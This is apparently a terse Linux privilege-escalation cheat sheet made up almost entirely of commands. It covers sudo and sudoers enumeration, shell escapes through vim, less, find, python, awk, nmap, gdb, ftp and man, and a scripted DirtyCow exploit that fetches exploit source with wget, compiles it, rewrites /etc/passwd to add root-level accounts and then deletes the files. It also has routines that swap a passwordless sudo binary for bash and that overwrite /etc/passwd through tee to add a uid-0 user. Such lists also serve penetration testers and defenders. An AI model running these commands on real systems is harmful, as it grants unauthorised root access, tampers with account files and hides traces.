cat /etc/shells

cat /etc/sudoers 
sudo -l

VIM:
	!/bin/bash
	:shell
more:
	!bash
less:
	v and :shell
find:
	find . -exec bash -i \;
python:
	>>import os
	>> os.system(‘/bin/bash’)
LUA:
	> os.execute("/bin/bash")
PERL:
	exec “/bin/bash”;
RUBY:
	exec “/bin/bash”
awk:
	sudo awk 'BEGIN {system("/bin/bash")}'
nmap:
	echo "os.execute('/bin/sh')" > /tmp/blah.nse
	sudo nmap -script=/tmp/blah.nse

DirtyCow:
	wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
	sleep 1
	gcc -pthread dirtyc0w.c -o dirtycow
	sleep 1
	./dirtycow  /etc/passwd aaa::0:0:,,,:/home/b3:/bin/bash &
	sleep 2
	sudo -S -u  aaa useradd -ou 0 -g 0 blah
	sleep 1
	./dirtycow /etc/passwd root:x:0:0:root:/root:/bin/bash &
	sleep 2
	rm dirtyc0w.c
	rm dirtycow
	sudo -S -u blah find . -exec bash -i \;

GDB:
	echo '!/bin/bash' > /tmp/Gdb
	sudo gdb -batch -x /tmp/Gdb
B3:
	a=$(sudo -l | grep NOPASSWD | head -n 1 | cut -d ":" -f2)
	sudo mv $a{,.back}
	sudo ln -s /bin/bash $a
	sudo $a
	sudo rm $a
	sudo mv $a.back $a

tee:
	user=123::0:0:,,,:/home/b3:/bin/bash
	root=root:x:0:0:root:/root/bin/bash
	cat /etc/passwd  > list.txt
	sed "1s|.*|$user|" list.txt | sudo tee /etc/passwd
	sudo -S -u 123 useradd -ou 0 -g 0 blah
	sed "1s|.*|$root|" /etc/passwd > list.txt
	sudo -S -u blah mv list.txt /etc/passwd
	sudo -S -u blah "/bin/bash"
FTP:
	sudo ftp
	!/bin/bash
man:
	sudo man man
	!bash
